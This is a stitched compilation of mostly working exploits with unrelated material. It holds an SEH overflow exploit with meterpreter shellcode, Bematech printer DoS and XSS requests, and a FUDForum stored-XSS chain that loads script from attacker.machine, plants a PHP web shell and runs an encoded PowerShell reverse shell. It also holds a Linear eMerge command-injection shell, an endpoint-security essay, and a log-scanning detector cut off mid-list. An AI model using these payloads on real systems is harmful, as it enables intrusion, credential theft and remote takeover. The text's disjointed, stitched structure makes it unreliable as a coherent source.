    random lowercase letters, "pattern" gives a cyclic Aa0Aa1... pattern for offset finding."""
    _type = _type.split(" ")

    if _type[0] == "trash":
        return _type[1].encode() * _length
    elif _type[0] == "random":
        return ''.join(random.choice(string.ascii_lowercase) for i in range(_length)).encode()
    elif _type[0] == "pattern":
        _pattern = ''
        _parts = ['A', 'a', '0']
        while len(_pattern) != _length:
            _pattern += _parts[len(_pattern) % 3]
            if len(_pattern) % 3 == 0:
                _parts[2] = chr(ord(_parts[2]) + 1)
                if _parts[2] > '9':
                    _parts[2] = '0'
                    _parts[1] = chr(ord(_parts[1]) + 1)
                    if _parts[1] > 'z':
                        _parts[1] = 'a'
                        _parts[0] = chr(ord(_parts[0]) + 1)
                        if _parts[0] > 'Z':
                            _parts[0] = 'A'
        return _pattern.encode()
    else:
        raise ValueError("pattern type not found: " + _type[0])


def generate_file(_name_file, _payload):
    print(_payload)
    print("[+] Creating malicious file")
    with open(_name_file, "wb") as f:
        f.write(_payload)
    print("[+] Payload of {0} bytes generated successfully.".format(len(_payload)))


def main():
    _parser = argparse.ArgumentParser()
    _parser.add_argument("--os", dest="os", help="target OS: win10 or winxp", required=True)
    _args = _parser.parse_args()

    # badchars 0x0a, 0x0d, >= 0x80

    _name_exploit = "ControlCenterPRO_v6_2_9.txt"

    # sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
    _shellcode = (b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        b"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
        b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
        b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
        b"\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
        b"\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
        b"\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
        b"\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
        b"\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
        b"\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
        b"\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
        b"\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
        b"\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
        b"\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
        b"\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
        b"\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
        b"\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
        b"\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
        b"\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
        b"\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
        b"\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
        b"\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
        b"\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
        b"\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
        b"\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
        b"\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
        b"\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
        b"\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
        b"\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
        b"\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
        b"\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
        b"\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
        b"\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
        b"\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
        b"\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
        b"\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
        b"\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
        b"\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
        b"\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
        b"\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
        b"\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
        b"\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
        b"\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
        b"\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
        b"\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
        b"\x53\x41\x41")

    _offset = 664      # bytes from the start of the field to the nSEH record
    _padding = 40000   # total size of the file pasted into the username field
    _nseh = b"\x42\x42\x77\x08"  # inc edx; inc edx; ja short +8: skips over the SEH record
    _seh = struct.pack("<L", 0x637c1571)  # 0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi  nonull, ascii

    if _args.os.lower() == "win10":
        # push esp; pop eax; add ax, 0x1834; push eax; pop esp: point ESP at the shellcode
        _esp_prepend = b"\x54\x58\x66\x05\x34\x18\x50\x5C"
        _inject = pattern_create("trash A", _offset)
        _inject += _nseh
        _inject += _seh
        _inject += b"A" * 4
        _inject += _esp_prepend

        _inject += _shellcode
        _inject += pattern_create("trash D", _padding - len(_inject))

    elif _args.os.lower() == "winxp":
        # same ESP adjustment with the XP offset (add ax, 0x0C7C)
        _esp_prepend = b"\x54\x58\x66\x05\x7C\x0C\x50\x5C"
        _inject = pattern_create("trash A", _offset)
        _inject += _nseh
        _inject += _seh
        _inject += b"A" * 4
        _inject += _esp_prepend
        _inject += b"A" * 16

        _inject += _shellcode
        _inject += pattern_create("trash D", _padding - len(_inject))
    else:
        print("[-] selected os is not supported, select win10 or winxp")
        return

    generate_file(_name_exploit, _inject)

if __name__ == "__main__":
    main()
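The exploit hard-codes the 664-byte offset to nSEH and a bad-character list (0x0a, 0x0d, anything >= 0x80, plus 0x00 passed to msfvenom). The following added example, not part of the exploit, shows the two helpers used to arrive at those numbers: the cyclic pattern in the same ordering as the exploit's "pattern" mode, the lookup that turns the dword shown in the debugger's SEH chain into an offset, and a scan of a candidate buffer for the listed bad bytes. The crash values used in the usage are computed from the pattern itself, not taken from a debugger session.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# One full cycle, Aa0 Aa1 ... Zz9, is 26*26*10*3 = 20280 bytes before it repeats.
CYCLE = "".join(a + b + c for a, b, c in product(ascii_uppercase, ascii_lowercase, digits))


def pattern_create(length: int) -> bytes:
    """Cyclic pattern of `length` bytes, same ordering as the exploit's pattern_create("pattern", n)."""
    return (CYCLE * (length // len(CYCLE) + 1))[:length].encode()


def pattern_offset(pattern: bytes, value) -> int:
    """Offset of a crash value inside the pattern. Pass the dword the debugger shows
    (read little-endian from the stack) as an int, or raw bytes; -1 if absent."""
    needle = struct.pack("<L", value) if isinstance(value, int) else value
    return pattern.find(needle)


def seh_layout(pattern: bytes, nseh_value: int) -> dict:
    """Given the nSEH dword seen in the debugger after the crash, return where nSEH,
    the SEH handler address and the bytes after the record sit in the buffer."""
    off = pattern_offset(pattern, nseh_value)
    if off < 0:
        raise ValueError("value not found in pattern; check endianness or pattern length")
    return {"nseh": off, "seh": off + 4, "after_record": off + 8}


def bad_bytes(payload: bytes, bad: bytes = b"\x00\x0a\x0d", high_bit: bool = True) -> list:
    """(position, value) of every byte the target mangles: the exploit's list is
    0x0a, 0x0d and anything >= 0x80, with 0x00 added because it ends a C string."""
    return [(i, b) for i, b in enumerate(payload) if b in bad or (high_bit and b >= 0x80)]


if __name__ == "__main__":
    pat = pattern_create(40000)
    # With a 40000-byte pattern in the username field, nSEH would show the
    # little-endian dword of pat[664:668]; feed that value back to find the offset.
    nseh_seen = struct.unpack("<L", pat[664:668])[0]
    print(hex(nseh_seen), seh_layout(pat, nseh_seen))
    print(bad_bytes(b"\x54\x58\x66\x05\x34\x18\x50\x5C"))  # the exploit's ESP-adjust stub
```

The reason the pattern length matters: the cycle repeats after 20280 bytes, so a 40000-byte pattern can contain the same dword twice and `find` returns the first; if the first offset does not reproduce the crash, try the second occurrence.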
            

Thoughts on intranet endpoint security work

Intranet office hosts

Security requirements for office hosts

The usual requirements for office hosts are:

Intrusion detection and prevention (put bluntly, HIDS- or HIPS-type products, usually bundled with Chinese antivirus software);

Vulnerability protection (patching; usually integrated into the same antivirus suite);

Software control (a software-centre function, usually acquired as part of a platform);

Logging;

Control scenarios (e.g. blocking SSIDs, data leak prevention / DLP).

A word on the logging requirement: logs usually serve two purposes, supporting the response when an attack occurs and tracing the source of an active attack.

Logs can record email, processes, services, commands, and so on.

Plan for raising agent installation and online rates on office hosts

Check every member of staff

Intranet admission control

Mandatory installation enforced from the virtual desktop back end

The three-step routine

Push installation to all employees

Bring all employees back online

Push vulnerability patches, install them automatically, and ingest logs in real time

Key control targets

Human resources department

Legal and finance departments

Senior executive group

Secretary and assistant group

Investment and financing department

Other key personnel

Expected key outcomes

Improved self-defence capability

Automated vulnerability patching

Secure storage of confidential data

Virus-outbreak scenarios can be anticipated

Simpler assessment of losses from an attack


Internal and external servers

Server security requirements

The usual requirements for servers are:

Windows Server

Patch installation, plus monitoring and upgrading of vulnerable components (automatic upgrades or patching are not recommended for servers: they require reboots and the patching state becomes uncontrollable)

Self-defence capability (HIPS or HIDS; NIPS can also be used at the network layer)

Trusted software centre (software control)

Log monitoring

Unix-like servers

Vulnerability monitoring and remediation (manual upgrades under monitoring; a vulnerability-scanning engine combined with PoCs is recommended)

Self-defence module (HIPS or HIDS; NIPS can also be used at the network layer)

Trusted software monitoring (use the official app store or official sources)

Log monitoring

Solution

Develop good installation templates (fully patched, with the required software installed and logs wired into the collection platform)

Every host brought online must be installed from an installation template

Establish an effective vulnerability-scanning mechanism so that Unix-like servers form a closed loop for vulnerability remediation; the same mechanism also works for Windows. Installing or developing an in-house server guard program, with unified control-platform management (unified vulnerability remediation), is also recommended.

All logs are fed into unified log management with automated alert analysis.

Key assets to protect

Authentication servers such as domain controllers, RADIUS servers and SSO (single sign-on) servers.

Key network equipment such as routers, switches, firewalls, DHCP servers and DNS servers.

Key business systems such as finance, HR, payroll, recruiting, legal, patent and document systems (contracts, agreements, tender documents).

Source-code version control, key industrial-control production equipment and other production assets.


# Exploit Title: Bematech Printer MP-4200 - Denial of Service 
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A

DoS PoC:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit

--------------------------------------------------------------------------------------------------------
XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
            
# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
# Date: 2019-10-26
# Exploit Author: liquidsky (JMcPeters)
# Vulnerable Software: FUDForum 3.0.9
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
# Version: 3.0.9
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
# Tested On: Windows / mysql / apache
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
# CVE: CVE-2019-18873


// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
//              The areas impacted are the admin panel and the forum.
//
//  XSS via username in Forum:
//  1.  Register an account and log in to the forum.
//  2.  Go to the user control panel. -> Account Settings -> change login
//  3.  Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
//  4.  When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
//  XSS via user-agent in Admin Panel:
//  1.  Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
//  2.  Send the XSS payload below (from an IP associated with an account) / host the script:
//  3.  curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
//  4.  When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

function patience()
{
	var u=setTimeout("grabShell()",5000);
}

// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell()
{
	var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%4
2%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%
43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
 	xhr = new XMLHttpRequest();
	xhr.open("GET", url, true);
	xhr.send(null);

}

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

    var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
    var fileName = "liquidsky.php";
    var url      = "/fudforum/adm/admbrowse.php";
    var ctype    = "application/x-php";
    var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
    var boundary = "-----------------------------9703186584101745941654835853";
    var fileSize = fileData.length;

    var body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
    body += currentdir + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += token + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + ctype + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";

    xhr.send(body);
}

//Grab SQ token
var req = new XMLHttpRequest();

req.onreadystatechange=function()
{
  if (req.readyState == 4 && req.status == 200) {
    var htmlPage = req.responseXML; /* fetch html */
    var SQ = htmlPage.getElementsByTagName("input")[0]
    submitFormWithTokenJS(SQ.value);
  }
}

req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();

patience();
            
# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-13
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7256

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time
import sys
import os
import re

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
	print '''
                                         .....                              
                                    .e$$$$$$$$$$$$$$e.                      
                                  z$$ ^$$$$$$$$$$$$$$$$$.                   
                                .$$$* J$$$$$$$$$$$$$$$$$$$e                 
                               .$"  .$$$$$$$$$$$$$$$$$$$$$$*-               
                              .$  $$$$$$$$$$$$$$$$***$$  .ee"               
                 z**$$        $$r ^**$$$$$$$$$*" .e$$$$$$*"                 
                " -\e$$      4$$$$.         .ze$$$""""                      
               4 z$$$$$      $$$$$$$$$$$$$$$$$$$$"                          
               $$$$$$$$     .$$$$$$$$$$$**$$$$*"                            
             z$$"    $$     $$$$P*""     J$*$$c                             
            $$"      $$F   .$$$          $$ ^$$                             
           $$        *$$c.z$$$          $$   $$                             
          $P          $$$$$$$          4$F   4$                             
         dP            *$$$"           $$    '$r                            
        .$                            J$"     $"                            
        $                             $P     4$                             
        F                            $$      4$                             
                                    4$%      4$                             
                                    $$       4$                             
                                   d$"       $$                             
                                   $P        $$                             
                                  $$         $$                             
                                 4$%         $$                             
                                 $$          $$                             
                                d$           $$                             
                                $F           "3                             
                         r=4e="  ...  ..rf   .  ""%                         
                        $**$*"^""=..^4*=4=^""  ^"""
  '''
	print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
	print '\x20\x20[-] by lqwrm (c) 2019'
	print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
	sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
    showme = requests.get('http://'+ipaddr+'/test.txt')
    print showme.text

while True:
	try:
		cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
		execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
		#time.sleep(1);
		readreq = requests.get('http://'+ipaddr+'/test.txt')
		print readreq.text
		if cmd.strip() == 'exit':
			print "[+] Erasing read stage file and exiting..."
			requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
			print "[+] Done. Ba-bye!\n"
			break
		else: continue
	except Exception:
		break

sys.exit()
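Added example, written for this page and not part of either advisory above: a small access-log scanner for the two request shapes those exploits leave behind, markup in the User-Agent header (the FUDforum "Recent sessions" vector) and shell metacharacters in query-string parameters (the eMerge `card_scan_decoder.php` vector). The log lines are constructed, and `attacker.example` is a placeholder host.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Apache/Nginx "combined" format:
#   ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Any HTML tag in a header that the application later renders into a page
HTML_TAG_RE = re.compile(r'<\s*/?\s*[a-z][a-z0-9]*[^>]*>', re.IGNORECASE)
# Shell metacharacters that have no business in a door or reader number
SHELL_META_RE = re.compile(r'[`;|&$]')


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def ua_injection(ua):
    """True when the User-Agent carries markup (decoded once, so %3Cscript%3E counts too)."""
    return bool(HTML_TAG_RE.search(unquote(ua)))


def query_injection(path):
    """Names of query parameters whose decoded value contains shell metacharacters."""
    query = urlsplit(path).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if SHELL_META_RE.search(value)]


def scan(lines):
    """Return (ip, finding, detail) tuples for every suspicious request."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if ua_injection(rec['ua']):
            findings.append((rec['ip'], 'html-in-user-agent', rec['ua']))
        params = query_injection(rec['path'])
        if params:
            findings.append((rec['ip'], 'shell-metachar-in-query', ','.join(params)))
    return findings


# Constructed log lines (not real traffic): the FUDforum User-Agent vector,
# a normal request, and a request shaped like the eMerge PoC's GET.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Nov/2019:10:01:02 +0000] "GET /fudforum/index.php HTTP/1.1" '
    '200 5120 "-" "<script src=\'http://attacker.example/fud.js\'></script>"',
    '10.0.0.6 - - [13/Nov/2019:10:01:09 +0000] "GET /fudforum/index.php?t=usrinfo&id=2 HTTP/1.1" '
    '200 7310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)"',
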